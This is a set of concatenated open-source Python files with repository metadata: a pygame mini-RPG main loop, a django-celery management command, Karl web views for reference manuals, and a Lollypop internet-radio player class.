            self.angle += self.rotatespeed
        if keys[pygame.K_d]: # right turn, clockwise
            self.angle -= self.rotatespeed
        # ------------- rotate ------------------
        # rotate from the pristine image0 each frame to avoid cumulative
        # quality loss, then re-center the new rect on the old center
        #if self.angle != self.oldangle:
        self.oldcenter = self.rect.center
        self.image = pygame.transform.rotate(self.image0, self.angle)
        self.rect = self.image.get_rect()
        self.rect.center = self.oldcenter
        #--------- rotate into direction of movement ------------
        #self.angle = math.atan2(-self.dx, -self.dy)/math.pi*180.0
        #self.image = pygame.transform.rotozoom(self.image0,self.angle,1.0)
        #--- calculate new position on screen -----
        self.gridcheck()
        self.rect.centerx = round(self.x,0)
        self.rect.centery = round(self.y,0)
        if self.hitpoints <= 0:
            self.kill()
class PygView(object):
    """Main game object: window and asset setup, sprite groups, mainloop."""

    def __init__(self, width=650, height=400, hitpoints=200.0, hitpointsfull=200.0, fps=60):
        """Initialize pygame, window, background, font,...
           default arguments
        """
        pygame.mixer.pre_init(44100, -16, 2, 2048) # setup mixer to avoid sound lag
        pygame.init()
        pygame.display.set_caption("Press ESC to quit")
        self.width = width
        self.height = height
        # mirrored on the class so sprites can read them without a view reference
        PygView.width = width
        PygView.height = height
        PygView.hitpoints = hitpoints
        PygView.hitpointsfull = hitpointsfull
        self.grid = 50       # edge length of one tile in pixels
        self.gridmaxx = 13   # number of tile columns
        self.gridmaxy = 8    # number of tile rows
        self.screen = pygame.display.set_mode((self.width, self.height), pygame.DOUBLEBUF)
        self.background = pygame.Surface(self.screen.get_size()).convert()
        self.background.fill((255,255,255)) # fill background white
        self.clock = pygame.time.Clock()
        self.fps = fps
        self.playtime = 0.0
        self.font = pygame.font.SysFont('mono', 24, bold=True)
        self.folder = "data"
        # walkability map: (tile center x, tile center y) -> True if passable
        self.tiles = {}
        for x in range(self.grid // 2, self.width, self.grid):
            for y in range(self.grid // 2, self.height, self.grid):
                self.tiles[(x, y)] = True
        # two blocked tiles forming a small wall
        self.tiles[(self.grid//2 + 10*self.grid, self.grid//2 + 1*self.grid)] = False
        self.tiles[(self.grid//2 + 10*self.grid, self.grid//2 + 2*self.grid)] = False
        self.room = 0 # index into self.backgrounds
        try: # ------- load sound -------
            self.crysound = pygame.mixer.Sound(os.path.join(self.folder,'claws.ogg')) #load sound
            self.warpsound = pygame.mixer.Sound(os.path.join(self.folder,'wormhole.ogg'))
            self.bombsound = pygame.mixer.Sound(os.path.join(self.folder,'bomb.ogg'))
            self.lasersound = pygame.mixer.Sound(os.path.join(self.folder,'shoot.ogg'))
            self.hitsound = pygame.mixer.Sound(os.path.join(self.folder,'beep.ogg'))
        except Exception:
            # bugfix: was a bare "except:" printing the undefined name 'folder'
            # (NameError); the attribute is self.folder
            print("could not load one of the sound files from folder %s. no sound, sorry" % self.folder)
        #-----------------define sprite groups------------------------
        self.drawgroup = pygame.sprite.LayeredUpdates()
        self.fragmentgroup = pygame.sprite.Group()
        self.bulletgroup = pygame.sprite.Group()
        self.snowmangroup = pygame.sprite.Group()
        self.dogegroup = pygame.sprite.Group()
        self.bargroup = pygame.sprite.Group()
        self.enemygroup = pygame.sprite.Group()
        self.playergroup = pygame.sprite.Group()
        self.doenergroup = pygame.sprite.Group()
        self.nonhostilegroup = pygame.sprite.Group()
        # only the allgroup draws the sprites, so i use LayeredUpdates() instead Group()
        self.allgroup = pygame.sprite.LayeredUpdates() # more sophisticated, can draw sprites in layers
        # assign default groups to each sprite class (pygame auto-add on creation)
        PlayerSprite.groups = self.allgroup, self.playergroup, self.drawgroup
        EvilSnowman.groups = self.allgroup, self.snowmangroup, self.enemygroup, self.drawgroup
        EvilDoge.groups = self.allgroup, self.dogegroup, self.enemygroup, self.drawgroup
        Doenertier.groups = self.allgroup, self.doenergroup, self.nonhostilegroup, self.drawgroup
        Fragment.groups = self.allgroup, self.fragmentgroup, self.drawgroup
        Bullet.groups = self.allgroup, self.bulletgroup, self.drawgroup
        Lifebar.groups = self.allgroup, self.bargroup, self.drawgroup
        #-------------loading files from data subdirectory -------------------------------
        try: # load images into classes (class variable !). if not possible, draw ugly images
            PlayerSprite.image.append(pygame.image.load(os.path.join(self.folder,"babytux.png")))
            PlayerSprite.image.append(pygame.image.load(os.path.join(self.folder,"babytux_neg.png")))
            self.bg1 = pygame.image.load(os.path.join("data","background2.jpg"))
            self.bg2 = pygame.image.load(os.path.join("data","background.jpg"))
        except Exception:
            # bugfix: was a bare "except:" printing the undefined name 'folder'
            # NOTE(review): on failure self.bg1/self.bg2 stay unset and the
            # self.backgrounds line below will raise -- pre-existing behavior
            print("no image files 'babytux.png' and 'babytux_neg.png' in subfolder %s" % self.folder)
            print("therefore drawing incredibly ugly sprites instead")
        self.silas = PlayerSprite(self.screen.get_rect(), imagenr=1)
        PygView.ferris = PlayerSprite(self.screen.get_rect(), imagenr=0)
        Lifebar(PygView.ferris)
        self.backgrounds = [self.bg1, self.bg2]
        self.background = self.bg1

    def paint(self):
        """Paint decorations for the current room onto the background and draw the grid."""
        self.background = self.backgrounds[self.room]
        if self.room == 0:
            #------- try out some pygame draw functions --------
            # pygame.draw.rect(Surface, color, Rect, width=0): return Rect
            pygame.draw.rect(self.background, (0,255,0), (50,50,100,25)) # rect: (x1, y1, width, height)
            # pygame.draw.circle(Surface, color, pos, radius, width=0): return Rect
            pygame.draw.circle(self.background, (0,200,0), (200,50), 35)
        elif self.room == 1:
            # pygame.draw.polygon(Surface, color, pointlist, width=0): return Rect
            pygame.draw.polygon(self.background, (0,180,0), ((250,100),(300,0),(350,50)))
            # pygame.draw.arc(Surface, color, Rect, start_angle, stop_angle, width=1): return Rect
            pygame.draw.arc(self.background, (0,150,0),(400,10,150,100), 0, 3.14) # radians instead of degrees
        # ------------------- make grid -------------
        for x in range(0, self.width, self.grid):
            pygame.draw.line(self.background, (0,255,35), (x,0), (x,self.height))
        for y in range(0, self.height, self.grid):
            pygame.draw.line(self.background, (0,255,35), (0,y), (self.width,y))

    def tilecheck(self, x, y):
        """Return True if the tile centered at pixel (x, y) exists and is walkable."""
        try:
            return self.tiles[(x, y)]
        except KeyError: # off the map -> blocked (was a bare except)
            return False

    def run(self):
        """The mainloop: input, movement, collisions, room switching, drawing."""
        self.paint()
        running = True
        # start positions: ferris top-left cell, silas bottom-right cell
        PygView.ferris.x = self.grid//2
        PygView.ferris.y = self.grid//2
        self.silas.x = self.grid*self.gridmaxx - self.grid//2
        self.silas.y = self.grid*self.gridmaxy - self.grid//2
        while running:
            for event in pygame.event.get():
                if event.type == pygame.QUIT:
                    running = False
                elif event.type == pygame.KEYDOWN:
                    if event.key == pygame.K_ESCAPE:
                        print("BYE")
                        running = False
                    # --- cursor keys move ferris one tile (if target is walkable) ---
                    if event.key == pygame.K_UP:
                        PygView.ferris.direction = "up"
                        if self.tilecheck(int(PygView.ferris.x), int(PygView.ferris.y)-self.grid):
                            PygView.ferris.up()
                            # silas follows into the cell ferris just left
                            self.silas.x = PygView.ferris.oldx
                            self.silas.y = PygView.ferris.oldy
                    elif event.key == pygame.K_DOWN:
                        PygView.ferris.direction = "down"
                        if self.tilecheck(int(PygView.ferris.x), int(PygView.ferris.y)+self.grid):
                            PygView.ferris.down()
                            self.silas.x = PygView.ferris.oldx
                            self.silas.y = PygView.ferris.oldy
                    elif event.key == pygame.K_LEFT:
                        PygView.ferris.direction = "left"
                        if self.tilecheck(int(PygView.ferris.x)-self.grid, int(PygView.ferris.y)):
                            # leaving room 1 at its left edge returns to room 0
                            if self.background == self.bg2 and (PygView.ferris.x - self.grid) <= self.grid//2:
                                self.room = 0
                                self.paint()
                                PygView.ferris.x = self.grid * self.gridmaxx - self.grid//2
                                PygView.ferris.room = 0
                            else:
                                PygView.ferris.left()
                                self.silas.x = PygView.ferris.oldx
                                self.silas.y = PygView.ferris.oldy
                    elif event.key == pygame.K_RIGHT:
                        PygView.ferris.direction = "right"
                        # tile right of ferris is allowed?
                        if self.tilecheck(int(PygView.ferris.x)+self.grid, int(PygView.ferris.y)):
                            # leaving room 0 at its right edge enters room 1
                            if self.background == self.bg1 and PygView.ferris.x + self.grid >= self.grid * self.gridmaxx - self.grid//2:
                                self.room = 1
                                self.paint()
                                PygView.ferris.x = 0
                                PygView.ferris.room = 1
                            else:
                                PygView.ferris.right()
                                self.silas.x = PygView.ferris.oldx
                                self.silas.y = PygView.ferris.oldy
                    # --- i/j/k/l move silas ---
                    if event.key == pygame.K_i:
                        self.silas.up()
                    if event.key == pygame.K_k:
                        self.silas.down()
                    if event.key == pygame.K_j:
                        self.silas.left()
                    if event.key == pygame.K_l:
                        self.silas.right()
                    if event.key == pygame.K_0: # 0 key resets silas' movement
                        self.silas.dx = 0
                        self.silas.dy = 0
                        self.silas.ddx = 0
                        self.silas.ddy = 0
                    # Teleportation
                    if event.key == pygame.K_f:
                        self.silas.x = (random.randint(0,640))
                        self.silas.y = (random.randint(0,640))
                    elif event.key == pygame.K_g:
                        Fragment(self.silas.x, self.silas.y, room=self.room)
                    elif event.key == pygame.K_v:
                        EvilSnowman(room=self.room)
                    elif event.key == pygame.K_b:
                        EvilDoge(room=self.room)
                    elif event.key == pygame.K_n:
                        Doenertier(room=self.room)
                    elif event.key == pygame.K_x: # spawn several waves of everything
                        for _ in range(4):
                            Doenertier(room=self.room)
                            EvilDoge(room=self.room)
                            EvilDoge(room=self.room)
                            EvilSnowman(room=self.room)
                    # fire bullets
                    if event.key == pygame.K_SPACE:
                        Bullet(PygView.ferris, PygView.ferris.direction, room=self.room)
            milliseconds = self.clock.tick(self.fps)
            seconds = milliseconds / 1000.0 # seconds passed since last frame
            self.playtime += milliseconds / 1000.0
            #------------collision detection--------------------------
            # bullets hitting players (a bullet never hurts its own shooter)
            for p in self.playergroup:
                crashgroup = pygame.sprite.spritecollide(p, self.bulletgroup, False, pygame.sprite.collide_rect)
                for bu in crashgroup:
                    if bu.boss == p:
                        continue
                    p.hitpoints -= 7
                    bu.kill()
                if self.ferris.hitpoints < 1:
                    break
            # players biting the delicious doenertier heal themselves
            for p in self.playergroup:
                crashgroup = pygame.sprite.spritecollide(p, self.doenergroup, False, pygame.sprite.collide_rect)
                for do in crashgroup:
                    p.hitpoints += 7.0
                    do.hitpoints -= 3.0
            # bullets hitting enemies
            for e in self.enemygroup:
                crashgroup = pygame.sprite.spritecollide(e, self.bulletgroup, False, pygame.sprite.collide_rect)
                for bu in crashgroup:
                    if bu.boss == e:
                        continue
                    e.hitpoints -= 7
                    bu.kill()
            # --- room change when ferris keeps moving past the screen edge ---
            if self.background == self.bg1 and PygView.ferris.x > self.width * 0.9 and PygView.ferris.dx > 0:
                self.room = 1
                self.paint()
                PygView.ferris.x = self.grid // 2
                PygView.ferris.room = 1
            if self.background == self.bg2 and PygView.ferris.x < self.width * 0.1 and PygView.ferris.dx < 0:
                self.room = 0
                self.paint()
                PygView.ferris.x = self.width // self.grid * self.grid - self.grid//2
                PygView.ferris.room = 0
            # ----------- update, draw only sprites of the current room, flip -----------
            self.allgroup.update(seconds)
            # copy allgroup and strip sprites belonging to other rooms
            self.drawgroup = self.allgroup.copy()
            for s in self.drawgroup:
                if s.room != self.room:
                    self.drawgroup.remove(s)
            self.drawgroup.draw(self.screen)
            pygame.display.flip()
            self.screen.blit(self.background, (0, 0))
        return
####
if __name__ == '__main__':
    # call with width of window and fps
    # print the key bindings first (showkeys() is defined elsewhere in this file)
    for line in showkeys():
        print(line)
    #i=raw_input("press enter")
    PygView().run()
|
paolo-perfahl/mini_rpg
|
minirpg001.py
|
Python
|
gpl-2.0
| 40,408
|
from __future__ import absolute_import, unicode_literals
from celery.bin import celery
from djcelery.app import app
from djcelery.management.base import CeleryCommand
# module-level celery command bound to the Django app; used below to discover
# option lists and to dispatch the command line
base = celery.CeleryCommand(app=app)
class Command(CeleryCommand):
    """The celery command: exposes celery's sub-commands through manage.py."""
    help = 'celery commands, see celery help'
    requires_model_validation = True
    # merge Django's management-command options with celery's own options
    # and its preload options so --help shows everything
    options = (CeleryCommand.options
               + base.get_options()
               + base.preload_options)
    def run_from_argv(self, argv):
        """Strip Django's default options, validate models, then delegate to celery."""
        argv = self.handle_default_options(argv)
        if self.requires_model_validation:
            self.validate()
        # celery expects the program name as a single "prog subcommand" string,
        # hence the joined '{0[0]} {0[1]}' first element
        base.execute_from_commandline(
            ['{0[0]} {0[1]}'.format(argv)] + argv[2:],
        )
|
HiveHQ/django-celery
|
djcelery/management/commands/celery.py
|
Python
|
bsd-3-clause
| 724
|
# Copyright (C) 2008-2009 Open Society Institute
# Thomas Moroz: tmoroz@sorosny.org
#
# This program is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License Version 2 as published
# by the Free Software Foundation. You may not use, modify or distribute
# this program under any other version of the GNU General Public License.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
from formencode import Invalid
from formencode import validators
from webob.exc import HTTPFound
from zope.component import getMultiAdapter
from zope.component import queryMultiAdapter
from zope.component.event import objectEventNotify
from repoze.bfg.chameleon_zpt import render_template
from repoze.bfg.chameleon_zpt import render_template_to_response
from repoze.bfg.security import authenticated_userid
from repoze.bfg.security import has_permission
from repoze.bfg.url import model_url
from repoze.enformed import FormSchema
from repoze.lemonade.content import create_content
from karl.events import ObjectModifiedEvent
from karl.events import ObjectWillBeModifiedEvent
from karl.views import baseforms
from karl.views.api import TemplateAPI
from karl.views.form import render_form_to_response
from karl.views.tags import set_tags
from karl.views.utils import convert_to_script
from karl.views.tags import get_tags_client_data
from karl.views.utils import make_unique_name
from karl.content.interfaces import ICommunityFile
from karl.content.interfaces import IPage
from karl.content.interfaces import IReferenceManual
from karl.content.interfaces import IReferenceSection
from karl.content.views.interfaces import IFileInfo
from karl.content.views.utils import get_previous_next
from karl.utils import get_folder_addables
from karl.utils import get_layout_provider
def add_referencemanual_view(context, request):
    """Show/process the 'Add Reference Manual' form.

    On submit: validate, create an IReferenceManual under *context*, tag it
    and redirect to the new object.  On cancel: redirect back to *context*.
    Otherwise (or on validation error) the form is (re-)rendered.
    """
    tags_list=request.POST.getall('tags')
    form = AddReferenceManualForm(tags_list=tags_list)
    if 'form.cancel' in request.POST:
        return HTTPFound(location=model_url(context, request))
    if 'form.submitted' in request.POST:
        try:
            converted = form.validate(request.POST)
            # Create the reference manual and store it
            creator = authenticated_userid(request)
            reference_manual = create_content(IReferenceManual,
                                              converted['title'],
                                              converted['description'],
                                              creator,
                                              )
            name = make_unique_name(context, converted['title'])
            context[name] = reference_manual
            # Save the tags on it.
            set_tags(reference_manual, request, converted['tags'])
            location = model_url(reference_manual, request)
            return HTTPFound(location=location)
        except Invalid, e:
            # validation failed: keep the user's input and field errors for re-render
            fielderrors = e.error_dict
            fill_values = form.convert(request.POST)
            tags_field = dict(
                records = [dict(tag=t) for t in request.POST.getall('tags')]
                )
    else:
        # initial GET: empty form
        fielderrors = {}
        fill_values = {}
        tags_field = dict(records=[])
    # Render the form and shove some default values in
    page_title = 'Add Reference Manual'
    api = TemplateAPI(context, request, page_title)
    # Get a layout
    layout_provider = get_layout_provider(context, request)
    layout = layout_provider('intranet')
    return render_form_to_response(
        'templates/addedit_referencemanual.pt',
        form,
        fill_values,
        post_url=request.url,
        formfields=api.formfields,
        fielderrors=fielderrors,
        api=api,
        head_data=convert_to_script(dict(
            tags_field = tags_field,
            )),
        layout=layout,
        )
def _get_toc(context, here_url):
"""Get the nested data used by ZPT for showing the refman TOC"""
section_up = here_url + '?sectionUp=%s'
section_down = here_url + '?sectionDown=%s'
item_up = here_url + '?section=%s&itemUp=%s'
item_down = here_url + '?section=%s&itemDown=%s'
# First, be a chicken and sync
context.ordering.sync(context.keys())
# Iterate over each section using the ordering for the order of
# __name__'s
sections = []
for section_name in context.ordering.items():
# Get the data about this section
section = context.get(section_name)
section.ordering.sync(section.keys())
item = {
'name': section_name,
'title': section.title,
'moveUp': section_up % section_name,
'moveDown': section_down % section_name,
'href': here_url + section_name,
'items': [],
}
# Now append data about each section's items, again using the
# ordering
for subitem_name in section.ordering.items():
subitem = section.get(subitem_name)
item['items'].append({
'name': subitem_name,
'title': subitem.title,
'href': here_url + section_name + '/' + subitem_name,
'moveUp': item_up % (section_name, subitem_name),
'moveDown': item_down % (section_name, subitem_name),
})
sections.append(item)
return sections
def _get_viewall(context, request, api):
    """Get the nested data used by ZPT for showing the refman TOC.

    Unlike _get_toc, every item is rendered to an HTML chunk so the whole
    manual can be displayed inline on one page.
    """
    # First, be a chicken and sync
    context.ordering.sync(context.keys())
    # Iterate over each section using the ordering for the order of
    # __name__'s
    sections = []
    for section_name in context.ordering.items():
        # Get the data about this section
        section = context.get(section_name)
        section.ordering.sync(section.keys())
        item = {
            'name': section_name,
            'title': section.title,
            'html': '<p>%s</p>' % section.description,
            'items': [],
            }
        # Now append data about each section's items, again using the
        # ordering
        for subitem_name in section.ordering.items():
            subitem = section.get(subitem_name)
            # If this is a page, we generate one chunk of HTML, if
            # File, a different
            if IPage.providedBy(subitem):
                html = subitem.text
            elif ICommunityFile.providedBy(subitem):
                # render a download/preview snippet for file content
                fileinfo = getMultiAdapter((subitem, request), IFileInfo)
                html = render_template(
                    'templates/inline_file.pt',
                    api=api,
                    fileinfo=fileinfo,
                    )
            else:
                html = '<p>Unknown type</p>'
            item['items'].append({
                'name': subitem_name,
                'title': subitem.title,
                'html': html,
                })
        sections.append(item)
    return sections
def show_referencemanual_view(context, request):
    """Display the reference-manual TOC; also handle reorder requests.

    Reordering is driven by query-string parameters: sectionUp/sectionDown
    move whole sections; itemUp/itemDown (plus 'section') move items within
    a section.  At most one reorder is applied per request.
    """
    # Look for moveUp or moveDown in QUERY_STRING, telling us to
    # reorder something
    status_message = None
    sectionUp = request.params.get('sectionUp', False)
    if sectionUp:
        section = context.get(sectionUp)
        context.ordering.moveUp(sectionUp)
        status_message = 'Moved section <em>%s</em> up' % section.title
    else:
        sectionDown = request.params.get('sectionDown', False)
        if sectionDown:
            section = context.get(sectionDown)
            context.ordering.moveDown(sectionDown)
            status_message = 'Moved section <em>%s</em> down' % section.title
        else:
            itemUp = request.params.get('itemUp', False)
            if itemUp:
                section = context.get(request.params.get('section'))
                section.ordering.moveUp(itemUp)
                title = section.get(itemUp).title
                status_message = 'Moved item <em>%s</em> up' % title
            else:
                itemDown = request.params.get('itemDown', False)
                if itemDown:
                    section = context.get(request.params.get('section'))
                    section.ordering.moveDown(itemDown)
                    title = section.get(itemDown).title
                    status_message = 'Moved item <em>%s</em> down' % title
    # "back to" link points at the manual's parent container
    backto = {
        'href': model_url(context.__parent__, request),
        'title': context.__parent__.title,
        }
    # actions depend on the user's permissions on this manual
    actions = []
    if has_permission('create', context, request):
        addables = get_folder_addables(context, request)
        if addables is not None:
            actions.extend(addables())
        actions.append(('Edit', 'edit.html'))
    if has_permission('delete', context, request):
        actions.append(('Delete', 'delete.html'))
    page_title = context.title
    api = TemplateAPI(context, request, page_title)
    # Get a layout
    layout_provider = get_layout_provider(context, request)
    layout = layout_provider('intranet')
    # provide client data for rendering current tags in the tagbox
    client_json_data = dict(
        tagbox = get_tags_client_data(context, request),
        )
    api.status_message = status_message
    return render_template_to_response(
        'templates/show_referencemanual.pt',
        api=api,
        actions=actions,
        head_data=convert_to_script(client_json_data),
        sections=_get_toc(context, api.here_url),
        backto=backto,
        layout=layout,
        )
def viewall_referencemanual_view(context, request):
    """Render the whole reference manual (all sections inline) on one page."""
    # "back to" link points at the manual's parent container
    parent = context.__parent__
    backto = {
        'href': model_url(parent, request),
        'title': parent.title,
        }
    api = TemplateAPI(context, request, context.title)
    # Get a layout
    layout = get_layout_provider(context, request)('intranet')
    # provide client data for rendering current tags in the tagbox
    client_json_data = dict(
        tagbox = get_tags_client_data(context, request),
        )
    return render_template_to_response(
        'templates/viewall_referencemanual.pt',
        api=api,
        actions=[],
        head_data=convert_to_script(client_json_data),
        sections=_get_viewall(context, request, api),
        backto=backto,
        layout=layout,
        )
def edit_referencemanual_view(context, request):
    """Show/process the 'Edit Reference Manual' form for *context*.

    On submit: validate, fire will-be-modified/modified events around the
    attribute changes, re-tag, and redirect with a status message.
    """
    tags_list = request.POST.getall('tags')
    form = EditReferenceManualForm(tags_list=tags_list)
    if 'form.cancel' in request.POST:
        return HTTPFound(location=model_url(context, request))
    if 'form.submitted' in request.POST:
        try:
            converted = form.validate(request.POST)
            # *will be* modified event
            objectEventNotify(ObjectWillBeModifiedEvent(context))
            context.title = converted['title']
            context.description = converted['description']
            # Save the tags on it
            set_tags(context, request, converted['tags'])
            # Modified
            context.modified_by = authenticated_userid(request)
            objectEventNotify(ObjectModifiedEvent(context))
            location = model_url(context, request)
            msg = "?status_message=Reference%20manual%20edited"
            return HTTPFound(location=location+msg)
        except Invalid, e:
            # validation failed: keep the user's input and field errors
            fielderrors = e.error_dict
            fill_values = form.convert(request.POST)
    else:
        # initial GET: pre-fill with the current values
        fielderrors = {}
        fill_values = dict(
            title = context.title,
            description = context.description,
            )
    # prepare client data
    client_json_data = dict(
        tags_field = get_tags_client_data(context, request),
        )
    # Render the form and shove some default values in
    page_title = 'Edit ' + context.title
    api = TemplateAPI(context, request, page_title)
    # Get a layout
    layout_provider = get_layout_provider(context, request)
    layout = layout_provider('intranet')
    return render_form_to_response(
        'templates/addedit_referencemanual.pt',
        form,
        fill_values,
        post_url=request.url,
        formfields=api.formfields,
        fielderrors=fielderrors,
        api=api,
        head_data=convert_to_script(client_json_data),
        layout=layout,
        )
def add_referencesection_view(context, request):
    """Show/process the 'Add Reference Section' form.

    On submit: validate, create an IReferenceSection under *context*, tag it,
    register its name in context.ordering, and redirect to the new object.
    """
    tags_list=request.POST.getall('tags')
    form = AddReferenceSectionForm(tags_list = tags_list)
    if 'form.cancel' in request.POST:
        return HTTPFound(location=model_url(context, request))
    if 'form.submitted' in request.POST:
        try:
            converted = form.validate(request.POST)
            # Be a chicken and sync the ordering every time before
            # adding something, just to make sure nothing gets lost.
            context.ordering.sync(context.keys())
            # Create the reference section and store it
            creator = authenticated_userid(request)
            reference_section = create_content(IReferenceSection,
                                               converted['title'],
                                               converted['description'],
                                               creator,
                                               )
            name = make_unique_name(context, converted['title'])
            context[name] = reference_section
            # Save the tags on it.
            set_tags(reference_section, request, converted['tags'])
            # Update the ordering
            context.ordering.add(name)
            location = model_url(reference_section, request)
            return HTTPFound(location=location)
        except Invalid, e:
            # validation failed: keep the user's input and field errors
            fielderrors = e.error_dict
            fill_values = form.convert(request.POST)
            tags_field = dict(
                records = [dict(tag=t) for t in request.POST.getall('tags')]
                )
    else:
        # initial GET: empty form
        fielderrors = {}
        fill_values = {}
        tags_field = dict(records=[])
    # Render the form and shove some default values in
    page_title = 'Add Reference Section'
    api = TemplateAPI(context, request, page_title)
    # Get a layout
    layout_provider = get_layout_provider(context, request)
    layout = layout_provider('intranet')
    return render_form_to_response(
        'templates/addedit_referencesection.pt',
        form,
        fill_values,
        post_url=request.url,
        formfields=api.formfields,
        fielderrors=fielderrors,
        api=api,
        head_data=convert_to_script(dict(
            tags_field = tags_field,
            )),
        layout=layout,
        )
def _get_ordered_listing(context, request):
    """Flatten the ordered children of *context* into title/href dicts."""
    # Defensively sync the ordering with the actual contents first
    context.ordering.sync(context.keys())
    children = (context.get(name, False) for name in context.ordering.items())
    return [{'title': child.title,
             'href': model_url(child, request)}
            for child in children]
def show_referencesection_view(context, request):
    """Display one reference section with its ordered child listing.

    Also computes previous/next navigation between siblings and the actions
    allowed by the user's permissions.
    """
    # "back to" link points at the section's parent (the manual)
    backto = {
        'href': model_url(context.__parent__, request),
        'title': context.__parent__.title,
        }
    actions = []
    if has_permission('create', context, request):
        addables = get_folder_addables(context, request)
        if addables is not None:
            actions.extend(addables())
        actions.append(('Edit', 'edit.html'))
    if has_permission('delete', context, request):
        actions.append(('Delete', 'delete.html'))
    page_title = context.title
    api = TemplateAPI(context, request, page_title)
    # Get a layout
    layout_provider = get_layout_provider(context, request)
    layout = layout_provider('intranet')
    previous, next = get_previous_next(context, request)
    # provide client data for rendering current tags in the tagbox
    client_json_data = dict(
        tagbox = get_tags_client_data(context, request),
        )
    return render_template_to_response(
        'templates/show_referencesection.pt',
        api=api,
        actions=actions,
        entries=_get_ordered_listing(context, request),
        head_data=convert_to_script(client_json_data),
        backto=backto,
        previous=previous,
        next=next,
        layout=layout,
        )
def edit_referencesection_view(context, request):
    """Show/process the 'Edit Reference Section' form for *context*.

    On submit: validate, fire will-be-modified/modified events around the
    attribute changes, re-tag, and redirect with a status message.
    """
    tags_list = request.POST.getall('tags')
    form = EditReferenceSectionForm(tags_list=tags_list)
    if 'form.cancel' in request.POST:
        return HTTPFound(location=model_url(context, request))
    if 'form.submitted' in request.POST:
        try:
            converted = form.validate(request.POST)
            # *will be* modified event
            objectEventNotify(ObjectWillBeModifiedEvent(context))
            context.title = converted['title']
            context.description = converted['description']
            # Save the tags on it
            set_tags(context, request, converted['tags'])
            # Modified
            context.modified_by = authenticated_userid(request)
            objectEventNotify(ObjectModifiedEvent(context))
            location = model_url(context, request)
            msg = "?status_message=Reference%20section%20edited"
            return HTTPFound(location=location+msg)
        except Invalid, e:
            # validation failed: keep the user's input and field errors
            fielderrors = e.error_dict
            fill_values = form.convert(request.POST)
    else:
        # initial GET: pre-fill with the current values
        fielderrors = {}
        fill_values = dict(
            title = context.title,
            description = context.description,
            )
    # prepare client data
    client_json_data = dict(
        tags_field = get_tags_client_data(context, request),
        )
    # Render the form and shove some default values in
    page_title = 'Edit ' + context.title
    api = TemplateAPI(context, request, page_title)
    # Get a layout
    layout_provider = get_layout_provider(context, request)
    layout = layout_provider('intranet')
    return render_form_to_response(
        'templates/addedit_referencesection.pt',
        form,
        fill_values,
        post_url=request.url,
        formfields=api.formfields,
        fielderrors=fielderrors,
        api=api,
        head_data=convert_to_script(client_json_data),
        layout=layout,
        )
class AddReferenceManualForm(FormSchema):
    """Validation schema for the add-reference-manual form."""
    title = baseforms.title
    tags = baseforms.tags
    description = validators.UnicodeString(strip=True)
class EditReferenceManualForm(FormSchema):
    """Validation schema for the edit-reference-manual form."""
    title = baseforms.title
    tags = baseforms.tags
    description = validators.UnicodeString(strip=True)
class AddReferenceSectionForm(FormSchema):
    """Validation schema for the add-reference-section form."""
    title = baseforms.title
    tags = baseforms.tags
    description = validators.UnicodeString(strip=True)
class EditReferenceSectionForm(FormSchema):
    """Validation schema for the edit-reference-section form."""
    title = baseforms.title
    tags = baseforms.tags
    description = validators.UnicodeString(strip=True)
|
boothead/karl
|
karl/content/views/references.py
|
Python
|
gpl-2.0
| 19,434
|
# Copyright (c) 2014-2016 Cedric Bellegarde <cedric.bellegarde@adishatz.org>
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from gi.repository import TotemPlParser, Gst
from lollypop.radios import Radios
from lollypop.player_base import BasePlayer
from lollypop.define import Type
from lollypop.objects import Track
from lollypop.utils import get_network_available
class RadioPlayer(BasePlayer):
"""
Radio player
This class neeed the parent object to be a BinPlayer
We keep a version of available radios (set_radios()) because we
need to be in sync with current/last view and not with db (popularity
changes)
"""
def __init__(self):
"""
Init radio player
"""
BasePlayer.__init__(self)
self.__current = None
self.__radios = []
def load(self, track):
"""
Load radio at uri
@param track as Track
"""
if get_network_available():
try:
self.__current = track
parser = TotemPlParser.Parser.new()
parser.connect("entry-parsed", self.__on_entry_parsed, track)
parser.parse_async(track.uri, True,
None, self.__on_parse_finished, track)
except Exception as e:
print("RadioPlayer::load(): ", e)
if self.is_party:
self.set_party(False)
self._next_track = Track()
self.emit('next-changed')
def next(self):
"""
Return next radio name, uri
@return Track
"""
track = Track()
if self._current_track.id != Type.RADIOS or not self.__radios:
return track
i = 0
for (name, url) in self.__radios:
i += 1
if self._current_track.album_artists[0] == name:
break
# Get next radio
if i >= len(self.__radios):
i = 0
name = self.__radios[i][0]
url = self.__radios[i][1]
if url:
track.set_radio(name, url)
return track
def prev(self):
"""
Return prev radio name, uri
@return Track
"""
track = Track()
if self._current_track.id != Type.RADIOS or not self.__radios:
return track
i = len(self.__radios) - 1
for (name, url) in reversed(self.__radios):
i -= 1
if self._current_track.album_artists[0] == name:
break
# Get prev radio
if i < 0:
i = len(self.__radios) - 1
name = self.__radios[i][0]
url = self.__radios[i][1]
if url:
track.set_radio(name, url)
return track
def set_radios(self, radios):
"""
Set available radios
@param radios as (name, url)
"""
self.__radios = radios
#######################
# PRIVATE #
#######################
def __start_playback(self, track):
"""
Start playing track
@param track as Track:
"""
self._plugins.volume.props.volume = 1.0
self._playbin.set_state(Gst.State.NULL)
self._playbin.set_property('uri', track.uri)
Radios().set_more_popular(track.album_artists[0])
self._current_track = track
self.__current = None
self._playbin.set_state(Gst.State.PLAYING)
if not self.__radios:
self.__radios = Radios().get()
self.emit('status-changed')
    def __on_parse_finished(self, parser, result, track):
        """
            Sometimes, TotemPlparse fails to add
            the playlist URI to the end of the playlist on parse failure.
            So, start playback with the original URI here as a fallback.
            @param parser as TotemPlParser.Parser
            @param result as Gio.AsyncResult
            @param track as Track
        """
        # Only start playing if this is still the pending load request
        # (__current is cleared once playback starts)
        if self.__current == track:
            self.__start_playback(track)
